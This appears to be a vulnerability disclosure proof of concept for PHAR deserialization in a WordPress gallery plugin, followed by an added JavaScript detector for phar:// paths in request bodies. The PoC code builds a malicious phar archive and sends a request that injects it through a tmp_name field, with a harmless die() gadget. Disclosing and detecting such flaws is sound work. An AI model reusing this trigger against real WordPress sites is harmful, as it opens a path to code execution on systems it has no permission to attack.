1. Ensure your WordPress installation is using PHP version 7.4 or earlier.
2. Create a Gallery and note its ID.
3. Create a `poc.phar` file using the following code, and add it to the root directory of the server:


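    <?php
    // Placeholder class; its serialized form is stored as the archive's metadata.
    class Evil {}

    $pharFile = 'poc.phar';

    try {
        // Remove any archive left over from a previous run.
        if (file_exists($pharFile)) {
            unlink($pharFile);
        }

        // Creating a Phar archive requires phar.readonly=0 in php.ini.
        $phar = new Phar($pharFile);

        $phar->addFromString( 'test.txt', 'text' );
        $phar->setStub( '<?php __HALT_COMPILER(); ?>' );
        $phar->setMetadata( new Evil() );

        echo "$pharFile successfully created" . PHP_EOL;
    } catch (Exception $e) {
        echo $e->getMessage();
    }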

4. Add the following code to the server to simulate a gadget:

    class Evil {
        // Runs when the object is unserialized, which makes the deserialization visible.
        function __wakeup() {
            die('Arbitrary deserialization');
        }
    }

5. Run the following code in your browser to see the deserialization occur, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly.

    await (await fetch("/index.php", {
        "credentials": "include",
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
        },
        "body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"image_list":[{"action":"upload","data_key":"a","filename":"xxxxxxx.jpg"}]}}]&extra_data={"a":{"tmp_name":"phar://poc.phar/tmp.png"}}',
        "method": "POST",
        "mode": "cors"
    })).text();
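
The request in step 5 carries a `phar://` path in a client-supplied `tmp_name` field, which a genuine upload never contains. As an added example (not part of the original advisory or the plugin's code), the following sketch decodes a form-encoded body and reports such values for detection or request filtering; `findWrapperPaths`, `stringLeaves` and the sample bodies are hypothetical names and constructed inputs.

```javascript
// Added example (not plugin or advisory code): find stream-wrapper paths such as
// phar:// inside a form-encoded request body, e.g. one taken from a proxy log.
const WRAPPER = /^\s*([a-z][a-z0-9+.-]*):\/\//i;

// Yield every string leaf of a decoded JSON value together with its path.
function* stringLeaves(node, path) {
  if (typeof node === "string") {
    yield { path, value: node };
  } else if (Array.isArray(node)) {
    for (let i = 0; i < node.length; i++) yield* stringLeaves(node[i], `${path}[${i}]`);
  } else if (node !== null && typeof node === "object") {
    for (const [k, v] of Object.entries(node)) yield* stringLeaves(v, `${path}.${k}`);
  }
}

// Hypothetical helper: returns one hit per suspicious value.
function findWrapperPaths(body) {
  const hits = [];
  for (const [param, raw] of new URLSearchParams(body)) {
    let decoded;
    try {
      decoded = JSON.parse(raw); // JSON parameters such as task_list, extra_data
    } catch {
      decoded = raw; // plain scalar parameter
    }
    for (const { path, value } of stringLeaves(decoded, param)) {
      const m = WRAPPER.exec(value);
      if (!m) continue;
      const scheme = m[1].toLowerCase();
      // A real upload's tmp_name is a local path, so any wrapper there is
      // suspicious; phar:// is flagged wherever it appears.
      if (scheme === "phar" || /(^|\.)tmp_name$/.test(path)) {
        hits.push({ path, scheme, value });
      }
    }
  }
  return hits;
}

// Constructed samples: the request shape from step 5, an encoded variant, a benign upload.
const SAMPLE_POC = 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&app_config={}' +
  '&extra_data={"a":{"tmp_name":"phar://poc.phar/tmp.png"}}';
const SAMPLE_ENCODED = "extra_data=%7B%22a%22%3A%7B%22tmp_name%22%3A%22PHAR%3A%2F%2Fpoc.phar%2Ftmp.png%22%7D%7D";
const SAMPLE_BENIGN = 'photocrati_ajax=1&extra_data={"a":{"tmp_name":"/tmp/phpA1b2C3"}}';

for (const body of [SAMPLE_POC, SAMPLE_ENCODED, SAMPLE_BENIGN]) {
  console.log(findWrapperPaths(body));
}
```

Because the body is percent-decoded and JSON-parsed before matching, encoded or upper-case spellings of the wrapper are caught as well as the literal form.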